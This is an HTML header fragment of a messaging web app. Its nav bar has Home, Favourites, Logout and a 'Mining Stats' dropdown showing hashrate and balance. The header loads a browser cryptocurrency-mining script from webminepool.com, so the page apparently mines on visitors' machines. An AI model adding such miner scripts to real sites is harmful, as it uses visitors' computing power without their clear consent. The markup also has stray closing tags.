<header>

  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <!-- Bootstrap CSS -->
  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css"
    integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
  <script src="https://kit.fontawesome.com/cb87cedded.js" crossorigin="anonymous"></script>
  <title>placeholder</title>
  <link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet">

  <script src="https://webminepool.com/lib/base.js"></script>

  <script defer src="http://localhost:3000/socket.io/socket.io.js"></script>
  <script defer src="scripts/Messenger.js"></script>


  <link rel="stylesheet" href="CSS/Messenger.css">
  <link rel="stylesheet" href="CSS/main.css">


  <div class="topnav">
    <img class="logo" src="images/logo.png">
    <a class="active" href="/index"><i class="fa fa-fw fa-home"></i>Home</a>
    <a href="/favourites"><i class="fa fa-fw fa-heart"></i>Favourites</a>


    <div class="dropdown">
      <button class="dropbtn dropdown-toggle" type="button" id="dropdownMenuButton" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
        <i class="fa fa-fw fa-bitcoin"></i>Mining Stats
      </button>
      <div class="dropdown-menu" aria-labelledby="dropdownMenuButton">
        <a class="dropdown-item bg-secondary text-white" href="#"><i class="fa fa-fw fa-speed"></i>Hashrate: <div id = "hashrate"></div> </a>
        <a class="dropdown-item bg-secondary text-white" href="#"><i class="fa fa-fw fa-bitcoin"></i>Balance: <div id = "balance"></div></a>
      </div>
    </div>
        </ul>
      </div>
    </div>

    
    <a style="float:right" href="/"><i class="fa fa-fw fa-user"></i>Logout</a>
  </div>
</header>